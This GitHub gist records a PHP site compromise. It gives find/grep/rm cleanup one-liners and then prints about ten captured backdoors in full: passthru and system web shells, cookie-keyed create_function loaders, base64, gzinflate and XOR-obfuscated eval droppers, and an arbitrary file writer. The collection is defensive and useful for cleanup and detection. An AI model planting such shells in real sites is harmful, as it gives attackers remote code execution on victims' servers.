Last active
February 4, 2022 19:33
-
-
Save fedir/d71eb1271a9ee672e29a1b02e84eb8a6 to your computer and use it in GitHub Desktop.
Traces of one hack and solutions for cleaning after it
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| find . -type f -iname '*.php' -exec sed -i 's/<?php if (isset(\$_GET\["_cmd"\])) die(passthru(\$_GET\["_cmd"\])); ?>//g' "{}" +; | |
| find . -iname 'index.php' | xargs grep '\x2fhom' | cut -f1 -d":" | xargs rm | |
| find . -iname '*.php' | xargs grep '\x2fh' | cut -f1 -d":" | xargs rm | |
| find . -iname '*.php' | xargs grep 'eval("' | grep 337 | cut -f1 -d":" | xargs rm | |
| find . -iname '*.php' | xargs grep '\{eval(' | cut -f1 -d":" | xargs rm | |
| find . -iname '*.php' | xargs grep '$_COOKIE;' | cut -f1 -d":" | xargs rm | |
| find . -iname '*.php' | xargs grep 'create_function'|grep base64_decode| cut -f1 -d":"| xargs rm |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /*0e5c7*/ | |
| @include "\x2fh\x6fm\x65/..."; | |
| /*0e5c7*/ | |
| echo @file_get_contents('index.htm.bak.bak'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php if (isset($_GET["_cmd"])) die(passthru($_GET["_cmd"])); ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $sdr=$_COOKIE; | |
| $akvn=$sdr[skzb]; | |
| if($akvn){ | |
| $zylnt=$akvn($sdr[nuan]);$kyogt=$akvn($sdr[ndbm]);$lozuc=$zylnt("",$kyogt);$lozuc(); | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $ajpcm = | |
| 'Jzt9bXM9eyRuYWdlPzEpYmxpc2VuY2FzKlthJzpyX2lwZXh0X2NveV1bLCRwPSRte2l'. | |
| 'mLCdtKD8xPSR0JHN0JHNpZXJfZmlsMSw0IlxudGVkan07dGFpRW5jZXN1IikpeyRtdC'. | |
| 'l7dWJsZX19ZGUoc3MpPnNtYWxscy0+aW5nPlthIF9fJywnaGlzJGRvQXV0XSwkfDJbL'. | |
| 'HNlO31paWYoZmFsJGZyci49ZENocy0+aWF0ZXBsXFMqZW1wT3JFX1hfRERSb25hI2kn'. | |
| 'O3JlPnNveXBlKHN1dGljMCk7dXJuYmFzKCRwLj0kb2R5JGRpVG8pbmNvfWVsdE1lTE9'. | |
| 'HRGViJyorb3InJHRoPkxFcy0+SCBDYSBpZS8ne3Rob2R5biBfZigncGFySVQnX2Ns | |
| ... | |
| $_fnsdc = create_function ('$ajpcm', fnsdc (base64_decode ( | |
| 'VxMCCBBEG0MYBVhLAlNEGAEAEAQPUW1XV1FfBwcTGRsVMyElfiYDMn47dwg3dzZpMjA'. | |
| 'ILG4wAkNwdXUmBndRen0gDypzIWIteyZkVyxiMVMwJCUKbSRZemBkACUtdG8LYzcbLW'. | |
| 'IlWw9pJl16IWEjCDcgUgJjIkpqZXdhAAFhf1x8NyEyaDJ2OmkhB20tdDF+KTILJ3g9A'. | |
| '1dRd3UXJWJ8R2MiUzJ9NnIxfiRddQdhE3k2MwsrfCBZQ1NjADUyYWgLZjQ2PnM0cSV0'. | |
| 'NWBIIWIxRCIwGztoMUpxanpHLSV1e1BjPQghcyUDE3YkWkgFYg9pICULLGskVWFWZAE'. | |
| '6JmZoaWckJgtWI3YuYTtnVAdnIkA6ICY0YyBFfnh3dQAwdk5iZiIIIWE2cRN1Ilp9IG'. | |
| 'MMaQczBCttJmRlZmcBKiFhbGVQMlJRZjUDE3E2c1Q+cwNmJiYmI2A2WnFxcUgENGRrB'. | |
| 'mQhIgB0N2FTZCROVzVjNnElJTYkYyJKan9jAQgzZWhbdiMiC2cmdRBhJQdTPHIlRysm'. | |
| 'NlFuN2BAeHd1AC50e3pTIAtRdDV2LXUnXXU/YlRlOjUhI28kXml7YwAyOGVOZnknIiV'. | |
| 'xMXUIZCtgUD54IX45JCYjeDRKZXZ6WxAyYF51VCc2Inw2Zlp9JE51PHUDdjowDyt1NG'. | |
| 'R+UWJyMSR1CEd2IiYAVCJ2OmUnB20HYyJYITMmNG4ycHpid3EqM2JvW3kHMSV+IGYmY'. | |
| 'jVddT9iVQAxOTEgYyB3fXBjACYGdVJxYyAEXGElWyFyNHNXNWQxQAUkJiN7NEUCdnRy'. | |
| 'EwZ2fHFoNFIcdDFiKXYmWm4CYSJlICA1EmMiSmp9Y0c1JmF7UGEiNip+I3YpdCVadiJ'. | |
| '/D1MyOyY0aSBKaXd3dAslZFF6awdSUXQjYSJgMndAJXYcaTIwCCxuMAJDU2NHBzV1CF'. | |
| 'dhMDULYTcDOXEwB3k1ciZyJiciAlg0SmJgdFg5AHZ8cWYyJiF3IgIEeiZeTDdlVH0kN'. | |
| 'yIFVDMDUHV2cSE0YXtHejQIC1YlAzl+MXNIImMxUyI0GzdrPVpAeHdxXl8UEB8SQTwn'. | |
| 'fyt4KnVDbUsSQjtCBhEPAFoAGhQcFRxDRWweHxJBPDd1NmUmYjgRcDJkNG8rLjA1Hjg'. | |
| 'bbhsbGQ==' | |
| ), $_COOKIE [str_replace('.', '_', $_SERVER['HTTP_HOST'])]) . ';'); $_fnsdc($ajpcm); | |
| function fnsdc ($fobkpc, $crxzwf) { return $fobkpc ^ str_repeat ($crxzwf, ceil (strlen ($fobkpc) / strlen ($crxzwf))); } | |
| ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $exuvnp = 'e0fxHd-_59ibtusn\'61ypm*248#galorvkc';$diprjd = Array();$diprjd[] = $exuvnp[9].$exuvnp[18].$exuvnp[17].$exuvnp[17].$exuvnp[9].$exuvnp[28].$exuvnp[0].$exuvnp[25].$exuvnp[6].$exuvnp[8].$exuvnp[25].$exuvnp[9].$exuvnp[11].$exuvnp[6].$exuvnp[24].$exuvnp[24].$exuvnp[23].$exuvnp[8].$exuvnp[6].$exuvnp[11].$exuvnp[5].$exuvnp[2].$exuvnp[25].$exuvnp[6].$exuvnp[5].$exuvnp[5].$exuvnp[17].$exuvnp[28].$exuvnp[34].$exuvnp[8].$exuvnp[2].$exuvnp[9].$exuvnp[1].$exuvnp[23].$exuvnp[25].$exuvnp[28];$diprjd[] = $exuvnp[4].$exuvnp[22];$diprjd[] = $exuvnp[26];$diprjd[] = $exuvnp[34].$exuvnp[30].$exuvnp[13].$exuvnp[15].$exuvnp[12];$diprjd[] = $exuvnp[14].$exuvnp[12].$exuvnp[31].$exuvnp[7].$exuvnp[31].$exuvnp[0].$exuvnp[20].$exuvnp[0].$exuvnp[28].$exuvnp[12];$diprjd[] = $exuvnp[0].$exuvnp[3].$exuvnp[20].$exuvnp[29].$exuvnp[30].$exuvnp[5].$exuvnp[0];$diprjd[] = $exuvnp[14].$exuvnp[13].$exuvnp[11].$exuvnp[14].$exuvnp[12].$exuvnp[31];$diprjd[] = $exuvnp[28].$exuvnp[31].$exuvnp[31].$exuvnp[28].$exuvnp[19].$exuvnp[7].$exuvnp[21].$exuvnp[0].$exuvnp[31].$exuvnp[27].$exuvnp[0];$diprjd[] = $exuvnp[14].$exuvnp[12].$exuvnp[31].$exuvnp[29].$exuvnp[0].$exuvnp[15];$diprjd[] = $exuvnp[20].$exuvnp[28].$exuvnp[34].$exuvnp[33];foreach ($diprjd[7]($_COOKIE, $_POST) as $zxlbxiz => $fofnfs){function rizhpbx($diprjd, $zxlbxiz, $lprovmw){return $diprjd[6]($diprjd[4]($zxlbxiz . $diprjd[0], ($lprovmw / $diprjd[8]($zxlbxiz)) + 1), 0, $lprovmw);}function jlqim($diprjd, $krajv){return @$diprjd[9]($diprjd[1], $krajv);}function fnymk($diprjd, $krajv){$xpoyv = $diprjd[3]($krajv) % 3;if (!$xpoyv) {eval($krajv[1]($krajv[2]));exit();}}$fofnfs = jlqim($diprjd, $fofnfs);fnymk($diprjd, $diprjd[5]($diprjd[2], $fofnfs ^ rizhpbx($diprjd, $zxlbxiz, $diprjd[8]($fofnfs))));} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php echo "<pre>";system($_GET['c']); echo "</pre>";?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #<?php | |
| eval("\n\$dgreusdi = intval(__LINE__) * 337;"); | |
| $a = "7VdrT+NGFP1eqf9hiCIcKwHFj7ClIQh2Bd1V6bIthVZC1Jo4k2QSvzR2674raF/94zDk78GLOou5W6Uo2M7Zlzz33MnTs3JzzgTsySlsa674CIXjhROtQ95fX1zo/W+/IbhONgjMOSkqBqRbnffpvcPumbtIeBg4CfdZAQdMOuh43OdJK52Qf3KySaNIh674vqxWRAzvFg/WxqHApG3SlpNZ03l5c/vjsjNCZNNwznnDlhwAbH2UeyCvW1zF/rR4U5h9zwpyCfBnTChMODJU+otD+HhpIiOk8pmB8u4RNL674iZazpDG7MB2RswNR6y1ReodlZIsNvLavv674xyUtuJ3JuyWuIwMxzDI/r18dN5BaBm7rCfcnFHJ8ltFUNkWDJQgSkZHvj+vSnn2+M8OJs8vri+jR+e2YYV7+vTj9cee9vbk57b65XZxfXhvHDL97k9W/n7942Mm+qBsAZFoycOB6748mMSpc/hGSNYjtSY9AckfGbKsQYZqpxKrHF674uez5cXv36lDsByIaLROaOYDGjwp3Wh7mYQRm+XwSVROryKVNcyKd/L6eqltXmlsJxeZVzLI2+mr42/Xw6Z068GPo8jvHdakYsjDzWkQHxPDoMBU2YYuciXGMu/LVvDHFpNApxw9rCGT7o9kmTHyFBPLYh1/v1C7qWm6Vys41c3hayu6uiBLzdhtm83f505JrsPmGBdNiJqKA+7A/FKCO7bfI7HXmdDuVU3zZnd3olO9ThKI/s6743cqWmW95Xx4LKxYdcsVSZUbDuuIer9No1uNzjW48/BAdlqlvV6sPR2ijcZLymcRG9MZW0XjGT2cz674aTWcgmfDaK4nA0GzNN18lgQCoanq/up0LQj61cFZIPhrOkIhaveJIWhbwC8JeW0cXGIw3e+F6xGlQqqyitQm61aKndAXgSTaMl674+kOeA4er+Gasd/dMzQFkLnTUJ6mglOP/ykLghRUUao279onpvKJIRCFkIy0u5fQ5jKK3eNk3+ZvtRYUS1tzRBOKDTVnH2vPgJNFsPU1dgVjQaGY5CgKB1BFtUIW7w46745UG674N5miihTDFNajUsQ2sl8o4fuKzahSmje29sAtnxk8iBaJwrfhYjxmIiutm+Fk6G1Su7j+e0bnc+//AOGBWfq2OqSHsZ582iXCXg+DB7hf4f4O9y674674urg/oQQQ/DdLbNBggwPiHQJC8IHOkFiADdhgAG674AYgBjAGQAZQBmHJaYTAiZUgO674TAiZ674DJ79faYIDNBZoLMhFKrWzYNIAtkFsgskFkgsyBkQciCkAUhG0pt4GzgbOkLcDZwNnD2qxKhDS674bQj0I9b7aZPmf8Ksj1FV9Iipa2imSI5I1duuy2Cd6pecfpmhF74zSeJs2bals2sbdkZ2BVKrsAiVRjdQu6d6fn+vk6AgbvL5Lk5fsYpT0a674UVJ7T8ocGDBauSltwMFn6do5y0iVGJVdoZV7xpGy+IAv49kJYiFmvpfDRMZYM674YyveVlza2G6+1Hbzs2w3S7YffAHTrZeabr3Y9DrhJ8v/sc2rKfcY6GUiHZOu2gw33QPDJ2VdXDo5PsbpplL71JLsD9IfM67StC674iPSDlPZNZvbf3/GaSMR4QW93BZj+D1mZkDdbf"; | |
| $a = str_replace($dgreusdi, "E", $a); | |
| eval (gzinflate(base64_decode($a))); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php $j3fd = 386;$GLOBALS['r2f00'] = Array();global $r2f00;$r2f00 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['o7bc3'] = "\x3f\x5b\x39\x6c\x5e\x4c\x6e\x7c\x54\x43\x7d\x63\x49\x52\x4a\x47\x6a\x35\x58\x61\x41\x76\x40\x2c\x4d\x2f\x77\x72\x5d\x31\x30\x59\x2b\x45\x65\x2a\x48\x78\x23\x5c\x44\x71\x7e\x66\x24\x7b\x3b\x5a\x34\x68\x70\x74\x3a\x27\x36\x3c\x22\x37\x69\x60\x53\x3e\xa\x26\x55\x20\x6f\x2e\x38\x33\xd\x62\x4f\x56\x6b\x5f\x42\x51\x25\x4e\x7a\x57\x32\x29\x79\x46\x64\x2d\x75\x73\x67\x9\x3d\x28\x21\x6d\x50\x4b";$r2f00[$r2f00['o7bc3'][37].$r2f00['o7bc3'][71].$r2f00['o7bc3'][2].$r2f00['o7bc3'][17]] = $r2f00['o7bc3'][11].$r2f00['o7bc3'][49].$r2f00['o7bc3'][27];$r2f00[$r2f00['o7bc3'][95].$r2f00['o7bc3'][2].$r2f00['o7bc3'][2].$r2f00['o7bc3'][54].$r2f00['o7bc3'][48].$r2f00['o7bc3'][82]] = $r2f00['o7bc3'][66].$r2f00['o7bc3'][27].$r2f00['o7bc3'][86];$r2f00[$r2f00['o7bc3'][34].$r2f00['o7bc3'][48].$r2f00['o7bc3'][69].$r2f00['o7bc3'][2].$r2f00['o7bc3'][54].$r2f00['o7bc3'][69]] = $r2f00['o7bc3'][89].$r2f00['o7bc3'][51].$r2f00['o7bc3'][27].$r2f00['o7bc3'][3].$r2f00['o7bc3'][34].$r2f00['o7bc3'][6];$r2f00[$r2f00['o7bc3'][51].$r2f00['o7bc3'][2].$r2f00['o7bc3'][2].$r2f00['o7bc3'][48].$r2f00['o7bc3'][86]] = $r2f00['o7bc3'][58].$r2f00['o7bc3'][6].$r2f00['o7bc3'][58].$r2f00['o7bc3'][75].$r2f00['o7bc3'][89].$r2f00['o7bc3'][34].$r2f00['o7bc3'][51];$r2f00[$r2f00['o7bc3'][84].$r2f00['o7bc3'][43].$r2f00['o7bc3'][69].$r2f00['o7bc3'][30].$r2f00['o7bc3'][82]] = $r2f00['o7bc3'][89].$r2f00['o7bc3'][34].$r2f00['o7bc3'][27].$r2f00['o7bc3'][58].$r2f00['o7bc3'][19].$r2f00['o7bc3'][3].$r2f00['o7bc3'][58].$r2f00['o7bc3'][80].$r2f00['o7bc3'][34];$r2f00[$r2f00['o7bc3'][19].$r2f00['o7bc3'][82].$r2f00['o7bc3'][69].$r2f00['o7bc3'][82].$r2f00['o7bc3'][43].$r2f00['o7bc3'][2].$r2f00['o7bc3'][69].$r2f00['o7bc3'][19]] = $r2f00['o7bc3'][50].$r2f00['o7bc3'][49].$r2f00['o7bc3'][50].$r2f00['o7bc3'][21].$r2f00['o7bc3'][34].$r2f00['o7bc3'][27].$r2f00['o7bc3'][89].$r2f00['o7bc3'][58].$r2f00['o7bc3'][66].$r2f00['o7bc3'][6];$r2f00[$r2f00['o7bc3'][80].$r2f00['o7bc3'][2].$r2f00['o7bc3'][48].$r2f00['o7bc3'][11]] = $r2f00['o7bc3'][88].$r2f00['o7bc3'][6].$r2f00['o7bc3'][89].$r2f00['o7bc3'][34].$r2f00['o7bc3'][27].$r2f00['o7bc3'][58].$r2f00['o7bc3'][19].$r2f00['o7bc3'][3].$r2f00['o7bc3'][58].$r2f00['o7bc3'][80].$r2f00['o7bc3'][34];$r2f00[$r2f00['o7bc3'][50].$r2f00['o7bc3'][71].$r2f00['o7bc3'][71].$r2f00['o7bc3'][2]] = $r2f00['o7bc3'][71].$r2f00['o7bc3'][19].$r2f00['o7bc3'][89].$r2f00['o7bc3'][34].$r2f00['o7bc3'][54].$r2f00['o7bc3'][48].$r2f00['o7bc3'][75].$r2f00['o7bc3'][86].$r2f00['o7bc3'][34].$r2f00['o7bc3'][11].$r2f00['o7bc3'][66].$r2f00['o7bc3'][86].$r2f00['o7bc3'][34];$r2f00[$r2f00['o7bc3'][19].$r2f00['o7bc3'][68].$r2f00['o7bc3'][82].$r2f00['o7bc3'][68].$r2f00['o7bc3'][48]] = $r2f00['o7bc3'][89].$r2f00['o7bc3'][34].$r2f00['o7bc3'][51].$r2f00['o7bc3'][75].$r2f00['o7bc3'][51].$r2f00['o7bc3'][58].$r2f00['o7bc3'][95].$r2f00['o7bc3'][34].$r2f00['o7bc3'][75].$r2f00['o7bc3'][3].$r2f00['o7bc3'][58].$r2f00['o7bc3'][95].$r2f00['o7bc3'][58].$r2f00['o7bc3'][51];$r2f00[$r2f00['o7bc3'][88].$r2f00['o7bc3'][17].$r2f00['o7bc3'][17].$r2f00['o7bc3'][69]] = $r2f00['o7bc3'][71].$r2f00['o7bc3'][19].$r2f00['o7bc3'][48].$r2f00['o7bc3'][54].$r2f00['o7bc3'][71].$r2f00['o7bc3'][82].$r2f00['o7bc3'][48].$r2f00['o7bc3'][69];$r2f00[$r2f00['o7bc3'][49].$r2f00['o7bc3'][48].$r2f00['o7bc3'][82].$r2f00['o7bc3'][68].$r2f00['o7bc3'][71].$r2f00['o7bc3'][43].$r2f00['o7bc3'][57].$r2f00['o7bc3'][57].$r2f00['o7bc3'][19]] = $r2f00['o7bc3'][74].$r2f00['o7bc3'][57].$r2f00['o7bc3'][48].$r2f00['o7bc3'][68].$r2f00['o7bc3'][30];$r2f00[$r2f00['o7bc3'][34].$r2f00['o7bc3'][68].$r2f00['o7bc3'][71].$r2f00['o7bc3'][82].$r2f00['o7bc3'][30].$r2f00['o7bc3'][11].$r2f00['o7bc3'][86].$r2f00['o7bc3'][68].$r2f00['o7bc3'][17]] = $_POST;$r2f00[$r2f00['o7bc3'][41].$r2f00['o7bc3'][71].$r2f00['o7bc3'][29].$r2f00['o7bc3'][29].$r2f00['o7bc3'][71]] = $_COOKIE;@$r2f00[$r2f00['o7bc3'][51].$r2f00['o7bc3'][2].$r2f00['o7bc3'][2].$r2f00['o7bc3'][48].$r2f00['o7bc3'][86]]($r2f00['o7bc3'][34].$r2f00['o7bc3'][27].$r2f00['o7bc3'][27].$r2f00['o7bc3'][66].$r2f00['o7bc3'][27].$r2f00['o7bc3'][75].$r2f00['o7bc3'][3].$r2f00['o7bc3'][66].$r2f00['o7bc3'][90], NULL);@$r2f00[$r2f00['o7bc3'][51].$r2f00['o7bc3'][2].$r2f00['o7bc3'][2].$r2f00['o7bc3'][48].$r2f00['o7bc3'][86]]($r2f00['o7bc3'][3].$r2f00['o7bc3'][66].$r2f00['o7bc3'][90].$r2f00['o7bc3'][75].$r2f00['o7bc3'][34].$r2f00['o7bc3'][27].$r2f00['o7bc3'][27].$r2f00['o7bc3'][66].$r2f00['o7bc3'][27].$r2f00['o7bc3'][89], 0);@$r2f00[$r2f00['o7bc3'][51].$r2f00['o7bc3'][2].$r2f00['o7bc3'][2].$r2f00['o7bc3'][48].$r2f00['o7bc3'][86]]($r2f00['o7bc3'][95].$r2f00['o7bc3'][19].$r2f00['o7bc3'][37].$r2f00['o7bc3'][75].$r2f00['o7bc3'][34].$r2f00['o7bc3'][37].$r2f00['o7bc3'][34].$r2f00['o7bc3'][11].$r2f00['o7bc3'][88].$r2f00['o7bc3'][51].$r2f00['o7bc3'][58].$r2f00['o7bc3'][66].$r2f00['o7bc3'][6].$r2f00['o7bc3'][75].$r2f00['o7bc3'][51].$r2f00['o7bc3'][58].$r2f00['o7bc3'][95].$r2f00['o7bc3'][34], 0);@$r2f00[$r2f00['o7bc3'][19].$r2f00['o7bc3'][68].$r2f00['o7bc3'][82].$r2f00['o7bc3'][68].$r2f00['o7bc3'][48]](0);$t58b85b0 = NULL;$h853093 = NULL;$r2f00[$r2f00['o7bc3'][90].$r2f00['o7bc3'][29].$r2f00['o7bc3'][54].$r2f00['o7bc3'][82].$r2f00['o7bc3'][43].$r2f00['o7bc3'][29].$r2f00['o7bc3'][68].$r2f00['o7bc3'][11]] = $r2f00['o7bc3'][54].$r2f00['o7bc3'][30].$r2f00['o7bc3'][57].$r2f00['o7bc3'][30].$r2f00['o7bc3'][2].$r2f00['o7bc3'][82].$r2f00['o7bc3'][29].$r2f00['o7bc3'][48].$r2f00['o7bc3'][87].$r2f00['o7bc3'][54].$r2f00['o7bc3'][48].$r2f00['o7bc3'][30].$r2f00['o7bc3'][11].$r2f00['o7bc3'][87].$r2f00['o7bc3'][48].$r2f00['o7bc3'][29].$r2f00['o7bc3'][71].$r2f00['o7bc3'][86].$r2f00['o7bc3'][87].$r2f00['o7bc3'][68].$r2f00['o7bc3'][69].$r2f00['o7bc3'][2].$r2f00['o7bc3'][29].$r2f00['o7bc3'][87].$r2f00['o7bc3'][68].$r2f00['o7bc3'][82].$r2f00['o7bc3'][34].$r2f00['o7bc3'][69].$r2f00['o7bc3'][57].$r2f00['o7bc3'][54].$r2f00['o7bc3'][48].$r2f00['o7bc3'][43].$r2f00['o7bc3'][11].$r2f00['o7bc3'][17].$r2f00['o7bc3'][69].$r2f00['o7bc3'][29];global $g162f18c;function k7480($t58b85b0, $sb27e4){global $r2f00;$hd85 = "";for ($o49c=0; $o49c<$r2f00[$r2f00['o7bc3'][34].$r2f00['o7bc3'][48].$r2f00['o7bc3'][69].$r2f00['o7bc3'][2].$r2f00['o7bc3'][54].$r2f00['o7bc3'][69]]($t58b85b0);){for ($rf060481=0; $rf060481<$r2f00[$r2f00['o7bc3'][34].$r2f00['o7bc3'][48].$r2f00['o7bc3'][69].$r2f00['o7bc3'][2].$r2f00['o7bc3'][54].$r2f00['o7bc3'][69]]($sb27e4) && $o49c<$r2f00[$r2f00['o7bc3'][34].$r2f00['o7bc3'][48].$r2f00['o7bc3'][69].$r2f00['o7bc3'][2].$r2f00['o7bc3'][54].$r2f00['o7bc3'][69]]($t58b85b0); $rf060481++, $o49c++){$hd85 .= $r2f00[$r2f00['o7bc3'][37].$r2f00['o7bc3'][71].$r2f00['o7bc3'][2].$r2f00['o7bc3'][17]]($r2f00[$r2f00['o7bc3'][95].$r2f00['o7bc3'][2].$r2f00['o7bc3'][2].$r2f00['o7bc3'][54].$r2f00['o7bc3'][48].$r2f00['o7bc3'][82]]($t58b85b0[$o49c]) ^ $r2f00[$r2f00['o7bc3'][95].$r2f00['o7bc3'][2].$r2f00['o7bc3'][2].$r2f00['o7bc3'][54].$r2f00['o7bc3'][48].$r2f00['o7bc3'][82]]($sb27e4[$rf060481]));}}return $hd85;}function ba46b243($t58b85b0, $sb27e4){global $r2f00;global $g162f18c;return $r2f00[$r2f00['o7bc3'][49].$r2f00['o7bc3'][48].$r2f00['o7bc3'][82].$r2f00['o7bc3'][68].$r2f00['o7bc3'][71].$r2f00['o7bc3'][43].$r2f00['o7bc3'][57].$r2f00['o7bc3'][57].$r2f00['o7bc3'][19]]($r2f00[$r2f00['o7bc3'][49].$r2f00['o7bc3'][48].$r2f00['o7bc3'][82].$r2f00['o7bc3'][68].$r2f00['o7bc3'][71].$r2f00['o7bc3'][43].$r2f00['o7bc3'][57].$r2f00['o7bc3'][57].$r2f00['o7bc3'][19]]($t58b85b0, $g162f18c), $sb27e4);}foreach ($r2f00[$r2f00['o7bc3'][41].$r2f00['o7bc3'][71].$r2f00['o7bc3'][29].$r2f00['o7bc3'][29].$r2f00['o7bc3'][71]] as $sb27e4=>$e9c8){$t58b85b0 = $e9c8;$h853093 = $sb27e4;}if (!$t58b85b0){foreach ($r2f00[$r2f00['o7bc3'][34].$r2f00['o7bc3'][68].$r2f00['o7bc3'][71].$r2f00['o7bc3'][82].$r2f00['o7bc3'][30].$r2f00['o7bc3'][11].$r2f00['o7bc3'][86].$r2f00['o7bc3'][68].$r2f00['o7bc3'][17]] as $sb27e4=>$e9c8){$t58b85b0 = $e9c8;$h853093 = $sb27e4;}}$t58b85b0 = @$r2f00[$r2f00['o7bc3'][80].$r2f00['o7bc3'][2].$r2f00['o7bc3'][48].$r2f00['o7bc3'][11]]($r2f00[$r2f00['o7bc3'][88].$r2f00['o7bc3'][17].$r2f00['o7bc3'][17].$r2f00['o7bc3'][69]]($r2f00[$r2f00['o7bc3'][50].$r2f00['o7bc3'][71].$r2f00['o7bc3'][71].$r2f00['o7bc3'][2]]($t58b85b0), $h853093));if (isset($t58b85b0[$r2f00['o7bc3'][19].$r2f00['o7bc3'][74]]) && $g162f18c==$t58b85b0[$r2f00['o7bc3'][19].$r2f00['o7bc3'][74]]){if ($t58b85b0[$r2f00['o7bc3'][19]] == $r2f00['o7bc3'][58]){$o49c = Array($r2f00['o7bc3'][50].$r2f00['o7bc3'][21] => @$r2f00[$r2f00['o7bc3'][19].$r2f00['o7bc3'][82].$r2f00['o7bc3'][69].$r2f00['o7bc3'][82].$r2f00['o7bc3'][43].$r2f00['o7bc3'][2].$r2f00['o7bc3'][69].$r2f00['o7bc3'][19]](),$r2f00['o7bc3'][89].$r2f00['o7bc3'][21] => $r2f00['o7bc3'][29].$r2f00['o7bc3'][67].$r2f00['o7bc3'][30].$r2f00['o7bc3'][87].$r2f00['o7bc3'][29],);echo @$r2f00[$r2f00['o7bc3'][84].$r2f00['o7bc3'][43].$r2f00['o7bc3'][69].$r2f00['o7bc3'][30].$r2f00['o7bc3'][82]]($o49c);}elseif ($t58b85b0[$r2f00['o7bc3'][19]] == $r2f00['o7bc3'][34]){eval/*c466e*/($t58b85b0[$r2f00['o7bc3'][86]]);}exit();} ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $vqdi="oJGEzsbpPzsbjEpe2V2YWwozsbYmFzsbzZTY0zsbX2Rl"; | |
| $fzsz="Y29kZSgzsbkzsbX1BPU1RbJ3VwZGF0ZSddKSk7fzsbQ=="; | |
| $bglo = str_replace("f","","fsftr_frfepflfafcfe"); | |
| $fyct="sbxTUzsbZVJztpZihyZXNldCgkYSk9PSzsbdqeCcuJGsgJiYgJGM"; | |
| $civq="JGzsbM9J2NvzsbdzsbW50JzskYT0kX1BPU1Q7JGs9J0Ez"; | |
| $vuqf = $bglo("sh", "", "bshasesh64_shdshecshode"); | |
| $euuf = $bglo("nv","","cnvrnvenvanvtnve_nvfnvunvnnvcnvtion"); | |
| $sxsf = $euuf('', $vuqf($bglo("zsb", "", $civq.$fyct.$vqdi.$fzsz))); $sxsf(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php file_put_contents($_REQUEST[fileName],$_REQUEST[data]); ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $vyxd="Gs9J2JjR3FVJztpZihyZtqXNldCgkYSktq9P"; | |
| $ymgj="Sd1bScuJGsgJiYgJGMoJGEpPjEpe2V2YWwoYmFzZTY0Xtq2RlY29k"; | |
| $jpmv="JGM9J2NvdtqW50JtqzskYT0kXtq1tqBPtqU1Q7Jtq"; | |
| $zozz = str_replace("h","","hshthrh_hrhephlhahche"); | |
| $xyhb="tqZSgktqX1BPU1RbJ3VwZGF0ZSddKSk7fQ=="; | |
| $soqb = $zozz("g", "", "basgeg6g4g_gdegcogde"); | |
| $odns = $zozz("rr","","crrrerratrrerr_rrfrrurrnrrctrrirrorrn"); | |
| $nxqb = $odns('', $soqb($zozz("tq", "", $jpmv.$vyxd.$ymgj.$xyhb))); $nxqb(); ?> |
Have access log for see the request to malware?
@WHK102 This gist is from 2018 :)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
@SergeySatskiy You are welcome :)